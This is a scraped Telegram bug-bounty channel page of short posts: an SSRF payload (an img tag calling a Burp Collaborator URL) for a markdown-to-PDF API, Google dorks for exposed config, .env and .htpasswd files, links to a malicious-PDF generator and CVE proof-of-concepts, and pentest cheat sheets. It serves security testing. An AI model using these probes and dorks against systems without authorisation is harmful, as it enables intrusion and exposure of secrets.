Bug bounty Tips
Open in Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Show more5 792
Subscribers
+424 hours
+767 days
+40730 days
Posts Archive
5 792
+1
Hey Hunter's,
DarkShadow here back again!
SSRF in pdf generation!
this api endpoint send the pdf generation request:
POST /api/v1/convert/markdown/pdf
Add this payload:
<img src=‘burp collab url’ />
comes 200ok and hit request in burp collaborator.
You can follow me in my x.com/darkshadow2bd
#ssrf #bugbountytips
5 792
🔥Oneliner to download ALL of @assetnote's wordlists:
⌨️
wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off5 792
☄️ Cheapest VPS for Bug Bounty & Pentesting
⚠️ https://brutsecurity.medium.com/cheapest-vps-for-bug-bounty-pentesting-fc6686572ee3
5 792
Google Dork - XSS Prone Parameters 🔥
site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&5 792
☄️ Malicious PDF Generator - Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
✨ https://github.com/jonaslejon/malicious-pdf
5 792
🔥Google Dork - Exposed Configs 🔍
site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
©TakSec5 792
#exploit
#AppSec
#Threat_Research
1⃣ Zimbra Exploit Analysis (CVE-2025-27915)
https://strikeready.com/blog/0day-ics-attack-in-the-wild
// These exploits take advantage of .ics files to breach vulnerable systems
2⃣ Notepad++ DLL Hijacking (CVE-2025-56383)
https://github.com/zer0t0/CVE-2025-56383-Proof-of-Concept
// If the threat actor has the ability to replace an applications DLL, they would have to ability to put malware directly in the same location...
3⃣ Lenovo Display Control Center - A simple ACL Exploit (CVE-2024-2175)
https://neodyme.io/de/blog/lenovo_dcc_lpe_logic
// Two operating methods are presented for achieving local administrative access: a race condition-based approach and a junction path exploitation technique
5 792
I request a small support in boosting my channel where it help me to be more consistent and more active...
https://t.me/boost/bugbounty_tech
5 792
based on the poll, i have understood is the members of group are looking for AI content too.. thanks for all the responses and i will make plan what content should be add here and what not .
5 792
Johnermac
>eJPT
>eCPPTv2
>PNPT
>eWPTXv2
>Active Directory Exploitation
>CRTP
>CRTE
>CLOUD
>CONTAINER
Link 🔗:-
https://johnermac.github.io/
5 792
↳ Pentest References and CheatSheets
• Hacking Articles
• Hack Tricks
• Cloud Hack Tricks
• Chryzsh Pentest Book
• Total OSCP Guide
• Hack The Box OSCP Preparation
• Steflan Security
• SecWiki
• Hausec
• HighOnCoffee
• six2dez pentest-book
• 0xffsec Handbook
• haax's Cheatsheet
• golinuxcloud
• Pentest Monkey
• Web App Testing Guide
• XSS CheatSheet
• Payload Box
• Steganography Tools
• Metasploit Unleashed
• Payloads All The Things
• Mobile Security Testing Guide
• WADComs
• LOLBAS
• explainshell
#infosec #cybersecurity #bugbounty #pentest #cheatsheet
➯ Share & Support Us
➯ Channel : @Hide_Club
5 792
#Tech_book
#Sec_code_review
"Node.js Secure Coding:
Defending Against Command Injection Vulnerabilities",
July 2023.
// Learn about secure coding practices with Node.js based on realworld CVE vulnerabilities in popular open-source npm packages: 12 Vulnerable npm Packages, 33 Self-assessment Questions, 10 Chapters
5 792
A library of tools for vibe coding
https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools
5 792
Automating API Vulnerability Testing Using Postman Workflows
https://haymiz.dev//security/2024/04/27/automating-apis-with-postman-workflows/
Available now! Telegram Research 2025 — the year's key insights 
